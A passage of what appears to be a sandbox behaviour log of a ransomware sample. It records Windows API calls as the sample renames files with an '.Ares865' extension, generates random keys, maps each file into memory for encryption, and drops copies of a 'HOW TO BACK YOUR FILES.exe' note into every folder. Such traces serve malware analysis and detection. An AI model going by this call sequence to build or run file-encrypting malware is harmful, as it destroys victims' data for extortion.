(hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.864] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82bc60, lpName=0x0) returned 0x170 [0130.865] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x800000, dwNumberOfBytesToMap=0x2bc60) returned 0x420000 [0130.991] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.991] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.991] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.002] lstrcpyW (in: lpString1=0x2cce47e, lpString2="msolap100.dll" | out: lpString1="msolap100.dll") returned="msolap100.dll" [0131.002] lstrlenW (lpString="msolap100.dll") returned 13 [0131.002] lstrlenW (lpString="Ares865") returned 7 [0131.002] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0131.002] lstrlenW (lpString=".dll") returned 4 [0131.003] lstrcmpiW (lpString1="msolap100.dll", lpString2=".dll") returned 1 [0131.003] lstrlenW (lpString=".lnk") returned 4 [0131.003] lstrcmpiW (lpString1="msolap100.dll", lpString2=".lnk") returned 1 [0131.003] lstrlenW (lpString=".ini") returned 4 [0131.003] lstrcmpiW (lpString1="msolap100.dll", lpString2=".ini") returned 1 [0131.003] lstrlenW (lpString=".sys") returned 4 [0131.003] lstrcmpiW (lpString1="msolap100.dll", lpString2=".sys") returned 1 [0131.003] lstrlenW (lpString="msolap100.dll") returned 13 [0131.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.Ares865") returned 84 [0131.003] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll.ares865"), dwFlags=0x1) returned 1 [0131.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6536040) returned 1 [0131.037] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.038] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.038] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x63be70, lpName=0x0) returned 0x170 [0131.041] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x600000, dwNumberOfBytesToMap=0x3be70) returned 0x420000 [0131.163] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.176] lstrcpyW (in: lpString1=0x2cce47e, lpString2="msolui100.dll" | out: lpString1="msolui100.dll") returned="msolui100.dll" [0131.176] lstrlenW (lpString="msolui100.dll") returned 13 [0131.176] lstrlenW (lpString="Ares865") returned 7 [0131.176] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0131.176] lstrlenW (lpString=".dll") returned 4 [0131.176] lstrcmpiW (lpString1="msolui100.dll", lpString2=".dll") returned 1 [0131.176] lstrlenW (lpString=".lnk") returned 4 [0131.176] lstrcmpiW (lpString1="msolui100.dll", lpString2=".lnk") returned 1 [0131.176] lstrlenW (lpString=".ini") returned 4 [0131.176] lstrcmpiW (lpString1="msolui100.dll", lpString2=".ini") returned 1 [0131.176] lstrlenW (lpString=".sys") returned 4 [0131.176] lstrcmpiW (lpString1="msolui100.dll", lpString2=".sys") returned 1 [0131.176] lstrlenW (lpString="msolui100.dll") returned 13 [0131.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.Ares865") returned 84 [0131.177] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll.ares865"), dwFlags=0x1) returned 1 [0131.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=275992) returned 1 [0131.180] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.180] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.180] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.181] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x43920, lpName=0x0) returned 0x170 [0131.182] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43920) returned 0x420000 [0131.197] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.202] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Resources" | out: lpString1="Resources") returned="Resources" [0131.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0131.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x31b068 [0131.202] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0131.202] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528feb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0131.202] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0131.202] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0131.202] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" [0131.202] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources" [0131.202] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.202] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.204] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.204] GetLastError () returned 0x0 [0131.205] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.205] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528feb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0131.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.205] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.205] lstrcpyW (in: lpString1=0x2cce492, lpString2="1033" | out: lpString1="1033") returned="1033" [0131.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0131.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x320fc8 [0131.205] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0131.205] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528feb60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0131.205] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0131.205] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528feb60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0131.205] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0131.205] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0131.205] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" [0131.206] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" [0131.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.207] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.207] GetLastError () returned 0x0 [0131.207] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.207] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528feb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0131.207] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.207] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.208] lstrcpyW (in: lpString1=0x2cce49c, lpString2="msmdsrv.rll" | out: lpString1="msmdsrv.rll") returned="msmdsrv.rll" [0131.208] lstrlenW (lpString="msmdsrv.rll") returned 11 [0131.208] lstrlenW (lpString="Ares865") returned 7 [0131.208] lstrcmpiW (lpString1="srv.rll", lpString2="Ares865") returned 1 [0131.208] lstrlenW (lpString=".dll") returned 4 [0131.208] lstrcmpiW (lpString1="msmdsrv.rll", lpString2=".dll") returned 1 [0131.208] lstrlenW (lpString=".lnk") returned 4 [0131.208] lstrcmpiW (lpString1="msmdsrv.rll", lpString2=".lnk") returned 1 [0131.208] lstrlenW (lpString=".ini") returned 4 [0131.208] lstrcmpiW (lpString1="msmdsrv.rll", lpString2=".ini") returned 1 [0131.208] lstrlenW (lpString=".sys") returned 4 [0131.208] lstrcmpiW (lpString1="msmdsrv.rll", lpString2=".sys") returned 1 [0131.208] lstrlenW (lpString="msmdsrv.rll") returned 11 [0131.208] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.Ares865") returned 97 [0131.208] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.ares865"), dwFlags=0x1) returned 1 [0131.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=666984) returned 1 [0131.211] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.213] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa3070, lpName=0x0) returned 0x170 [0131.214] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa3070) returned 0xdd0000 [0131.240] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.250] lstrcpyW (in: lpString1=0x2cce49c, lpString2="msolui100.rll" | out: lpString1="msolui100.rll") returned="msolui100.rll" [0131.250] lstrlenW (lpString="msolui100.rll") returned 13 [0131.250] lstrlenW (lpString="Ares865") returned 7 [0131.250] lstrcmpiW (lpString1="100.rll", lpString2="Ares865") returned -1 [0131.250] lstrlenW (lpString=".dll") returned 4 [0131.250] lstrcmpiW (lpString1="msolui100.rll", lpString2=".dll") returned 1 [0131.250] lstrlenW (lpString=".lnk") returned 4 [0131.250] lstrcmpiW (lpString1="msolui100.rll", lpString2=".lnk") returned 1 [0131.251] lstrlenW (lpString=".ini") returned 4 [0131.251] lstrcmpiW (lpString1="msolui100.rll", lpString2=".ini") returned 1 [0131.251] lstrlenW (lpString=".sys") returned 4 [0131.251] lstrcmpiW (lpString1="msolui100.rll", lpString2=".sys") returned 1 [0131.251] lstrlenW (lpString="msolui100.rll") returned 13 [0131.251] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.Ares865") returned 99 [0131.251] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.ares865"), dwFlags=0x1) returned 1 [0131.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15384) returned 1 [0131.261] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.261] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.261] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.262] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f20, lpName=0x0) returned 0x170 [0131.265] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f20) returned 0x190000 [0131.268] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.269] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.269] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.270] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0131.270] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0131.270] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0131.270] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\how to back your files.exe"), bFailIfExists=1) returned 0 [0131.272] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0131.273] GetLastError () returned 0x0 [0131.273] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0131.273] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51494530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52924cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52924cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0131.273] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.273] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0131.273] lstrcpyW (in: lpString1=0x2cce494, lpString2="as80.xsl" | out: lpString1="as80.xsl") returned="as80.xsl" [0131.273] lstrlenW (lpString="as80.xsl") returned 8 [0131.273] lstrlenW (lpString="Ares865") returned 7 [0131.273] lstrcmpiW (lpString1="s80.xsl", lpString2="Ares865") returned 1 [0131.274] lstrlenW (lpString=".dll") returned 4 [0131.274] lstrcmpiW (lpString1="as80.xsl", lpString2=".dll") returned 1 [0131.274] lstrlenW (lpString=".lnk") returned 4 [0131.274] lstrcmpiW (lpString1="as80.xsl", lpString2=".lnk") returned 1 [0131.274] lstrlenW (lpString=".ini") returned 4 [0131.274] lstrcmpiW (lpString1="as80.xsl", lpString2=".ini") returned 1 [0131.274] lstrlenW (lpString=".sys") returned 4 [0131.274] lstrcmpiW (lpString1="as80.xsl", lpString2=".sys") returned 1 [0131.274] lstrlenW (lpString="as80.xsl") returned 8 [0131.274] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.Ares865") returned 90 [0131.274] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.ares865"), dwFlags=0x1) returned 1 [0131.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.277] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17248) returned 1 [0131.277] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.278] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4660, lpName=0x0) returned 0x170 [0131.280] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4660) returned 0x190000 [0131.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, 